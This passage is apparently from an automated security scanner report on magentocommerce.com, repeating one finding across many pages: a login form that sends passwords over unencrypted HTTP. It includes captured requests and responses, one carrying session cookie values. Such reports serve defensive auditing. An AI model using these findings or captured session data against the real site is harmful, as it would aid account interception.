Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.14. http://www.magentocommerce.com/company/careers

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.15. http://www.magentocommerce.com/company/contact-us

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.16. http://www.magentocommerce.com/company/contact-us/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.17. http://www.magentocommerce.com/company/contact-us/thank_you

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.18. http://www.magentocommerce.com/company/events

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.19. http://www.magentocommerce.com/company/events/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.20. http://www.magentocommerce.com/company/inthepress

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.21. http://www.magentocommerce.com/company/inthepress/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.22. http://www.magentocommerce.com/company/jobs/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.23. http://www.magentocommerce.com/company/leadership

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.24. http://www.magentocommerce.com/company/leadership/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.25. http://www.magentocommerce.com/company/media

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.26. http://www.magentocommerce.com/company/media/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.27. http://www.magentocommerce.com/company/pci-compliance

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
